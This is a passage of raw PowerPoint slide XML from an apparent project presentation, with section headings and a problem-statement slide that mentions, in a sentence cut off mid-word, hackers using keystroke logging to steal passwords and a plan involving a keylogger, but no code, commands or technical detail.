            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="706713" y="2648736"/>
            <a:ext cx="6760289" cy="383759"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="725448" y="2667470"/>
            <a:ext cx="6722821" cy="346291"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="255523" tIns="0" rIns="255523" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" defTabSz="577850">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Project overview</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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93" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="223837" y="3430296"/>
            <a:ext cx="9657556" cy="327600"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="30ADEC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="738681" y="3255701"/>
            <a:ext cx="6760289" cy="383759"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="757415" y="3274435"/>
            <a:ext cx="6722821" cy="346291"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="255523" tIns="0" rIns="255523" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" defTabSz="577850">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Who are the end users</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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96" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="223837" y="4003031"/>
            <a:ext cx="9657556" cy="327600"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="30ADEC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="706713" y="3828097"/>
            <a:ext cx="6760289" cy="383759"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="725448" y="3846831"/>
            <a:ext cx="6722821" cy="346292"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="255523" tIns="0" rIns="255523" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" defTabSz="577850">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Solution and its value</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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99" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="223837" y="4609657"/>
            <a:ext cx="9657556" cy="327600"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="30ADEC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="706713" y="4417777"/>
            <a:ext cx="6760289" cy="383760"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="725448" y="4436511"/>
            <a:ext cx="6722821" cy="346292"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="255523" tIns="0" rIns="255523" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" defTabSz="577850">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Modelling</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="223837" y="5199337"/>
            <a:ext cx="9657556" cy="327600"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="90000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="30ADEC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="706713" y="5007457"/>
            <a:ext cx="6760289" cy="383760"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="725448" y="5026191"/>
            <a:ext cx="6722821" cy="346291"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="255523" tIns="0" rIns="255523" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" defTabSz="577850">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>result</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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7989357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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="108" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8475020" y="3193025"/>
            <a:ext cx="2762249" cy="3257550"/>
            <a:chOff x="8475020" y="3193025"/>
            <a:chExt cx="2762249" cy="3257550"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="9837096" y="5621900"/>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6" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="9837096" y="61553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2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="8475020" y="3193025"/>
              <a:ext cx="2762249" cy="3257550"/>
            </a:xfrm>
            <a:prstGeom prst="rect"/>
            <a:noFill/>
            <a:ln w="12700" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8686800" y="14344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4916" y="598887"/>
            <a:ext cx="10018713"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727960" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>ROB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="55" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-370" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-375" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1230152" y="1758313"/>
            <a:ext cx="6940869" cy="2215991"/>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just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inter" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>To tackle this issue we are therefore using a software keylogger that can be remotely ins</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
